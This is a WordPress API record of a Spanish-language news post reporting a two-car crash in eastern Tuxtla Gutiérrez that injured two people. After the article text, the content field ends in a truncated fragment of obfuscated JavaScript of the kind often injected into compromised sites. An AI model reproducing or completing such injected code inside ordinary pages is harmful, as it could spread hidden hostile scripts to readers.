{"id":19900,"date":"2025-01-18T04:14:26","date_gmt":"2025-01-18T04:14:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19900"},"modified":"2025-01-18T04:14:27","modified_gmt":"2025-01-18T04:14:27","slug":"chocan-particulares-en-la-zona-oriente-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19900","title":{"rendered":"Chocan particulares en la zona Oriente de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250117-WA0014-1024x768.jpg\" alt=\"\" class=\"wp-image-19901\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250117-WA0014-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250117-WA0014-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250117-WA0014-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250117-WA0014-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250117-WA0014-2048x1536.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 17 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Un Jetta y un Spark chocaron este viernes en la zona Oriente de Tuxtla Guti\u00e9rrez dejando como saldo dos personas heridas.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, el conductor de un Vw Jetta de color gris circulaba sobre el Bulevar \u00c1ngel Albino Corzo de Oriente a Poniente y al llegar a la intersecci\u00f3n de la 16 Oriente gir\u00f3 a la izquierda e hizo corte a un Spark de color rojo.<\/p>\n\n\n\n<p>Los dos ocupantes del Jetta resultaron heridos los cuales fueron trasladados a un hospital para su atenci\u00f3n m\u00e9dica especializada por sus familiares.<\/p>\n\n\n\n<p>Las dos unidades fueron puestas a disposici\u00f3n del Ministerio P\u00fablico para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 17 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Un Jetta y un Spark chocaron este viernes en la zona Oriente de Tuxtla Guti\u00e9rrez dejando como saldo dos personas heridas. Los reportes oficiales informaron que, el conductor de un Vw Jetta de color gris circulaba sobre el Bulevar \u00c1ngel Albino Corzo de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19901,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-19900","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19900","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19900"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19900\/revisions"}],"predecessor-version":[{"id":19902,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19900\/revisions\/19902"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19901"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19900"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19900"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19900"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}